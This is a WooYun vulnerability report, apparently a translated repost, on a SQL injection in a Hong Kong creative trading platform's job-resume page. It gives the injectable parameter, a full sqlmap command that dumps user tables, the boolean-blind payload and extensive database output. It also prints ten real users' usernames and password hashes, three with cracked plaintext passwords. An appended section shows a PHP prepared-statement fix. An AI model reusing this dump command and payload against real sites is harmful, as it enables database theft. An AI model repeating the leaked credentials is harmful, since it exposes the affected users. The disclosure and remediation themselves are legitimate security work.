
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0157731

Title: SQL injection in the main site of 香港創意交易平台 (passwords and e-mail addresses of 10,000+ users) (Hong Kong region)

Affected vendor: 香港創意交易平台

Author: 路人甲

Submitted: 2015-12-03 11:35

Fixed by: 2015-12-08 11:36

Published: 2015-12-08 11:36

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 10

Status: handed to third-party partner (HKCERT, Hong Kong Computer Emergency Response Team Coordination Centre) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2015-12-03: Details sent to the vendor; awaiting vendor response
2015-12-08: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

The main site of 香港創意交易平台 has a SQL injection vulnerability (exposing passwords and e-mail addresses of 10,000+ users)

Detailed description:

URL: http://**.**.**.**/modules/jobs/index2.php?pa=viewResume&rid=00000000883

$ python sqlmap.py -u "http://**.**.**.**/modules/jobs/index2.php?pa=viewResume&rid=00000000883" -p rid --technique=B --random-agent --batch  --no-cast -Danyidea_anyidea01 -T xoops_users -C uname,pass,name,email --dump --start 1 --stop 10


back-end DBMS: MySQL 5
Database: anyidea_anyidea01
+-------------+---------+
| Table | Entries |
+-------------+---------+
| xoops_users | 10364 |
+-------------+---------+


Database: anyidea_anyidea01
Table: xoops_users
[10 entries]
+-------------+-------------------------------------------+------+---------------------------+
| uname | pass | name | email |
+-------------+-------------------------------------------+------+---------------------------+
| yan_mcmug | 1610d99bbd13b300487c992cf35fa29c | | [email protected]**.**.**.** |
| nurikodomto | bb12b3dcc45be59fc8bde152a5e2d319 | | [email protected]**.**.**.** |
| leungkar | 1eaaaeebba29787989af2819ca811bbc | | [email protected]**.**.**.** |
| Vencent | bcbda11e419cca4dca93e0232bcf1ef1 | | [email protected]**.**.**.** |
| fly_design | c27b91c76443289c5754054bb0aad1cf | | [email protected]**.**.**.** |
| greatmoment | b427ebd39c845eb5417b7f7aaf1f9724 (zxcvbn) | | [email protected]**.**.**.** |
| otto | a152e841783914146e4bcd4f39100686 (asdfgh) | | [email protected]**.**.**.** |
| wilsonho | 990a1aeb1f5630064e5308716c308583 (102901) | | [email protected]**.**.**.** |
| gallium | 2235c41b8801fd450bc252961b4d40c0 | | [email protected]**.**.**.** |
| S.Y | 439cbba42741be50eff62c68880e86af | | [email protected]**.**.**.** |
+-------------+-------------------------------------------+------+---------------------------+

Proof of vulnerability:

current user:    '[email protected]'
current user is DBA: False
database management system users [1]:
[*] 'anyidea_anyidea'@'localhost'
Database: anyidea_anyidea01
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| xoops_users_attributes | 39938 |
| xoops_anyidea_event | 32202 |
| xoops_jobs_resume | 17223 |
| xoops_users | 10364 |
| cdb_memberfields | 10352 |
| cdb_members | 10352 |
| xoops_groups_users_link | 10343 |
| xoops_users_20130711 | 8074 |
| cdb_posts | 6030 |
| xoops_xoopscomments | 4893 |
| cdb_attachments | 4573 |
| cdb_mythreads | 4217 |
| cdb_threads | 4037 |
| xoops_jobs_transaction | 3783 |
| check_code | 3298 |
| xoops_jobs_jobfaq | 3115 |
| xoops_jobs_vote | 1991 |
| cdb_onlinetime | 1666 |
| xoops_group_permission | 1567 |
| cdb_myposts | 1466 |
| xoops_users_auth | 1425 |
| xoops_catads_ads | 1133 |
| xoops_priv_msgs | 974 |
| xoops_jobs_listing | 941 |
| xoops_session | 512 |
| xoops_avatar | 495 |
| xoops_avatar_user_link | 495 |
| xoops_users_backup | 465 |
| cdb_rsscaches | 293 |
| xoops_xfguestbook_country | 240 |
| xoops_catads_departements | 237 |
| xoops_config | 233 |
| xoops_jobs_rss | 224 |
| xoops_configoption | 207 |
| xoops_stories | 193 |
| cdb_settings | 187 |
| cdb_statvars | 169 |
| xoops_tplfile | 147 |
| cdb_searchindex | 140 |
| xoops_lt_config | 139 |
| xoops_tplsource | 136 |
| supe_effects | 125 |
| supe_cache | 114 |
| cdb_threadsmod | 104 |
| cms_join_event | 96 |
| xoops_lt_users_permissions | 93 |
| xoops_lt_referers | 86 |
| xoops_catads_cat | 85 |
| cdb_subscriptions | 79 |
| xoops_lt_bayesian_tokens | 72 |
| supe_categories | 69 |
| xoops_lt_permissions | 66 |
| xoops_block_module_link | 61 |
| supe_settings | 59 |
| xoops_newblocks | 57 |
| cdb_polloptions | 53 |
| cdb_stats | 50 |
| xoops_catads_feedback | 48 |
| cdb_blogcaches | 44 |
| cdb_favorites | 40 |
| xoops_xoopsnotifications | 38 |
| cdb_pms | 37 |
| supe_prefields | 37 |
| xoops_users_industry | 36 |
| cdb_stylevars | 34 |
| xoops_jobs_categories | 32 |
| cdb_smilies | 29 |
| xoops_lt_article_categories_link | 28 |
| xoops_lt_articles | 28 |
| xoops_lt_articles_text | 28 |
| xoops_counter | 24 |
| cdb_forumfields | 23 |
| cdb_forums | 23 |
| cdb_moderators | 23 |
| xoops_catads_regions | 23 |
| supe_styles | 20 |
| xoops_content | 20 |
| xoops_smiles | 17 |
| cdb_usergroups | 15 |
| xoops_catads_options | 14 |
| xoops_smartfaq_answers | 14 |
| cdb_polls | 13 |
| xoops_smartfaq_faq | 12 |
| cdb_crons | 11 |
| xoops_lt_articles_categories | 11 |
| cdb_medals | 10 |
| cdb_sessions | 10 |
| cms_event_talk | 10 |
| supe_crons | 10 |
| xoops_modules | 10 |
| cms_event | 9 |
| supe_usergroups | 9 |
| cdb_bbcodes | 7 |
| cdb_buddys | 7 |
| xoops_configcategory | 7 |
| xoops_ranks | 7 |
| xoops_stats_userscreen | 7 |
| cdb_ratelog | 6 |
| supe_attachmenttypes | 6 |
| xoops_banner | 6 |
| xoops_bb_reads_forum | 6 |
| xoops_groups | 6 |
| xoops_lt_bayesian_filter_info | 6 |
| xoops_lt_blogs | 6 |
| xoops_xfguestbook_config | 6 |
| cdb_ranks | 5 |
| xoops_bb_forums | 5 |
| xoops_jobs_status | 5 |
| xoops_lt_articles_comments | 5 |
| xoops_smartfaq_categories | 5 |
| xoops_stats_usercolor | 5 |
| cdb_onlinelist | 4 |
| xoops_jobs_ttype | 4 |
| xoops_users_class | 4 |
| cdb_admingroups | 3 |
| xoops_bannerclient | 3 |
| cdb_adminsessions | 2 |
| cdb_failedlogins | 2 |
| cdb_words | 2 |
| xoops_bb_categories | 2 |
| xoops_bb_online | 2 |
| xoops_bb_reads_topic | 2 |
| xoops_ctem_pagelink | 2 |
| xoops_jobs_price | 2 |
| xoops_jobs_type | 2 |
| xoops_lt_users | 2 |
| xoops_online | 2 |
| xoops_topics | 2 |
| cdb_profilefields | 1 |
| cdb_styles | 1 |
| cdb_templates | 1 |
| cdb_threadtypes | 1 |
| cms_sys | 1 |
| cms_user | 1 |
| supe_robots | 1 |
| xoops_bannerfinish | 1 |
| xoops_bb_posts | 1 |
| xoops_bb_posts_text | 1 |
| xoops_bb_topics | 1 |
| xoops_imagecategory | 1 |
| xoops_imgset | 1 |
| xoops_imgset_tplset_link | 1 |
| xoops_jobs_res_categories | 1 |
| xoops_stories_votedata | 1 |
| xoops_tplset | 1 |
| xoops_xfguestbook_msg | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 2490 |
| STATISTICS | 651 |
| GLOBAL_STATUS | 291 |
| SESSION_STATUS | 291 |
| GLOBAL_VARIABLES | 277 |
| SESSION_VARIABLES | 277 |
| PARTITIONS | 275 |
| TABLES | 275 |
| KEY_COLUMN_USAGE | 250 |
| TABLE_CONSTRAINTS | 232 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 130 |
| COLLATIONS | 129 |
| CHARACTER_SETS | 36 |
| SCHEMA_PRIVILEGES | 18 |
| PLUGINS | 7 |
| ENGINES | 5 |
| SCHEMATA | 3 |
| PROCESSLIST | 1 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: anyidea_anyidea01
Table: xoops_users_20130711
[1 column]
+--------+
| Column |
+--------+
| pass |
+--------+
Database: anyidea_anyidea01
Table: supe_members
[1 column]
+----------+
| Column |
+----------+
| password |
+----------+
Database: anyidea_anyidea01
Table: cms_sys
[1 column]
+----------+
| Column |
+----------+
| password |
+----------+
Database: anyidea_anyidea01
Table: xoops_users
[1 column]
+--------+
| Column |
+--------+
| pass |
+--------+
Database: anyidea_anyidea01
Table: cdb_members
[1 column]
+----------+
| Column |
+----------+
| password |
+----------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: rid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pa=viewResume&rid=00000000883 AND 5794=5794
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5
Database: anyidea_anyidea01
+-------------+---------+
| Table | Entries |
+-------------+---------+
| xoops_users | 10364 |
+-------------+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: rid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pa=viewResume&rid=00000000883 AND 5794=5794
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5
Database: anyidea_anyidea01
Table: xoops_users
[37 columns]
+-----------------+-----------------------+
| Column | Type |
+-----------------+-----------------------+
| level | tinyint(3) unsigned |
| actkey | varchar(8) |
| attachsig | tinyint(1) unsigned |
| bio | tinytext |
| class | tinyint(3) unsigned |
| contact | varchar(100) |
| email | varchar(60) |
| industry | tinyint(4) |
| last_login | int(10) unsigned |
| name | varchar(60) |
| notify_method | tinyint(1) |
| notify_mode | tinyint(1) |
| pass | varchar(32) |
| points_con | int(10) unsigned |
| points_pro | int(10) unsigned |
| posts | mediumint(8) unsigned |
| rank | smallint(5) unsigned |
| tel | varchar(50) |
| theme | varchar(100) |
| timezone_offset | float(3,1) |
| uid | mediumint(8) unsigned |
| umode | varchar(10) |
| uname | varchar(25) |
| uorder | tinyint(1) unsigned |
| url | varchar(100) |
| user_aim | varchar(18) |
| user_avatar | varchar(30) |
| user_from | varchar(100) |
| user_icq | varchar(15) |
| user_intrest | varchar(150) |
| user_mailok | tinyint(1) unsigned |
| user_msnm | varchar(100) |
| user_occ | varchar(100) |
| user_regdate | int(10) unsigned |
| user_sig | tinytext |
| user_viewemail | tinyint(1) unsigned |
| user_yim | varchar(25) |
+-----------------+-----------------------+

Fix recommendation:

Put a WAF in front of it.
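The report's fix stops at "put a WAF in front of it". As an added example (not the report's own code and not code from the affected site), the following shows what the application-level fix looks like in PHP, the stack sqlmap identified (PHP 5.3.3 on MySQL 5): the rid GET parameter is validated and then bound through a PDO prepared statement instead of being concatenated into the query text. The table name xoops_jobs_resume and the database and user names are taken from the sqlmap output on this page; the resume table's columns (rid, title, body), the HTML the handler emits, and the connection password are assumptions.

```php
<?php
// Added example, not code from the original report or from the affected site.
// Hardened handler for index2.php?pa=viewResume&rid=...
// Assumptions: the columns rid/title/body of xoops_jobs_resume, the HTML
// output, and the connection password are placeholders.

/**
 * Look up one resume by id. Returns an associative array, or null when the
 * parameter is malformed or no row matches.
 */
function fetchResume(PDO $db, $rid)
{
    // A legitimate rid in the report looks like 00000000883: a short run of
    // digits. Anything else (for example a value with "AND 5794=5794"
    // appended, as in sqlmap's payload) is rejected before any SQL is built.
    if (!is_string($rid) || !ctype_digit($rid) || strlen($rid) > 20) {
        return null;
    }

    // The value travels to MySQL as a bound parameter, never as query text,
    // so a boolean condition appended to it cannot alter the WHERE clause.
    $stmt = $db->prepare(
        'SELECT rid, title, body FROM xoops_jobs_resume WHERE rid = :rid LIMIT 1'
    );
    $stmt->bindValue(':rid', $rid, PDO::PARAM_STR);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return ($row === false) ? null : $row;
}

// Connection setup. Database and user names are the ones shown in the
// report's sqlmap output; the password is a placeholder.
$db = new PDO(
    'mysql:host=localhost;dbname=anyidea_anyidea01',
    'anyidea_anyidea',
    'REPLACE_WITH_REAL_PASSWORD',
    array(
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        // Real server-side prepares rather than client-side string emulation.
        PDO::ATTR_EMULATE_PREPARES => false,
    )
);
$db->exec('SET NAMES utf8');

// Request handling (PHP 5.3-compatible: no null-coalescing operator).
$pa  = isset($_GET['pa'])  ? $_GET['pa']  : '';
$rid = isset($_GET['rid']) ? $_GET['rid'] : '';

if ($pa === 'viewResume') {
    $resume = fetchResume($db, $rid);
    if ($resume === null) {
        header('HTTP/1.1 404 Not Found');
        echo 'Resume not found.';
    } else {
        // Escape on output too; closing the injection does not cover XSS.
        echo '<h1>' . htmlspecialchars($resume['title'], ENT_QUOTES, 'UTF-8') . '</h1>';
        echo '<div>' . nl2br(htmlspecialchars($resume['body'], ENT_QUOTES, 'UTF-8')) . '</div>';
    }
}
```

A WAF, as the report suggests, only filters traffic in front of this code; the prepared statement is what actually closes the injection, and the digit check is defence in depth that also keeps malformed ids out of the database logs. Separately, the dump shows pass as a varchar(32) column holding 32-character hashes, three of which sqlmap annotated with dictionary-cracked plaintexts (zxcvbn, asdfgh, 102901); once the injection is closed, those credentials should be treated as exposed, users prompted to reset, and stored hashes migrated to a salted, slow hash (password_hash() in PHP 5.5 and later) at next login.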

Copyright notice: please credit the source when reposting, 路人甲@乌云


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2015-12-08 11:36

Vendor reply:

Latest status:

None yet